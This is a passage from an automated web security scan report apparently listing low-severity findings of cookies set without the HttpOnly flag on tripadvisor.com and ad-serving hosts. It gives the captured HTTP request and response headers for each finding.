GET /SmartDeals-g1-m11893?&q=bos&checkin=10/9/2011&checkout=10/16/2011&adults=1 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:37:46 GMT
Server: Apache
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:37:46 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; Domain=.tripadvisor.com; Expires=Mon, 10-Oct-2011 00:37:46 GMT; Path=/
Location: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=utf-8


14.80. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:38:20 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AC.DFW*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.58*MC.13091*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals%5C.html*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 356474
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html
...[SNIP]...

14.81. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.58*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; PCT=%7B%22p-2147%22%3A1%7D; ServerPool=T

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:16 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FBoston-Hotels-Hotel-Commonwealth%5C.h894999%5C.Hotel-Information%3Ficmdtl%3DMT1110027Z3xeMPeET6itK0Qu1f-JQAAU%5C.894999%5C.HDSSDeE%5C.T%5C.QCI%5C.258705%5C.ch%5C.668%5C.60745%5C.en_US%5C.%5C.%3Fchkin%3D10%2F14%2F11%3FhashTag%3DroomsAndRates%3Fchkout%3D10%2F16%2F11%3Feapid%3D21187-1%3Frm1%3Da2%3F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.3.13878.5.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:02:16 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2673

GIF89aC..............t......rtrd.N...z.g),*.................p...n.Y[.Edd].........CEC.......\j............]T7.............................RUU.......... 4............STOC=).tL.....].....T..A...X.B....
...[SNIP]...

14.82. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.CA5B1B8B5844B487705CCB63281E5A9D*SQ.1*MC.11539*GR.52*TBR.4*EXEX.78*ABTR.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1285

GIF89av....:............q......m.Z.....n000...@@@...w.f...............w.e```......ppp.....}............ ..}PPP.......!.YL)we7..<3......`.r>hX0.....g...........S..L......b.NX.B...................
...[SNIP]...

14.83. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.D003686BE8331A8DC70A23D10F4589D0*SQ.1*MC.11539*GR.23*TBR.31*EXEX.3*ABTR.21*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AYlcHw2yynj9VaPDGh0MhGA7WhW0nFykhjayN3jcE9A%2FT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1307

GIF89av....:.........q.........m.Z.....n000...@@@...w.f...............w.e...```.....}...ppp...........} ...PPP........we7.!.YL)..`hX0.r>...<3...............g........L..Sb.NX.B...................
...[SNIP]...

14.84. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=A.2.12811.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:37:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2132

GIF89a..3.......w.f......DDE.........T.@...%%&...k.Y............TTU...sst...556.........`.Mccd............ddd.....s.................i..*..x..Z.qD%!..J_..b......D;%....Ym......sc<......5...........cV4I
...[SNIP]...

14.85. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/partner/tripAdvisorLogo-11007-0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/partner/tripAdvisorLogo-11007-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TACds=C.1.11539.1.2011-10-02; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.12*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals*FBH.2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:47 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.2.11007.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:01:47 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1211

GIF89ak...............q.?......trsQMO.....m....!..............|.....V...................**_O4..[.....}{gD...^cf.......TighZWX....~..i......EAA...=99_\_..............................................
...[SNIP]...

14.86. http://www.tumri.net/ads/ads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tumri.net
Path:   /ads/ads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:09:11 GMT
Expires: Mon Oct 03 00:09:11 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-1000424298|547040017; Domain=.tumri.net; Expires=Tue, 02-Oct-2012 00:09:11 GMT; Path=/
Set-Cookie: JSESSIONID=4BD4DF728C0984070FCE52BC4AA1C77B; Path=/ads
Content-Length: 1
Connection: keep-alive
14.87. http://a.collective-media.net/adj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/cm.guardian/;sz=300x250;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 416
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:50:07 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

14.88. http://a.collective-media.net/cmadj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$;env=ifr;ord1=879803;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
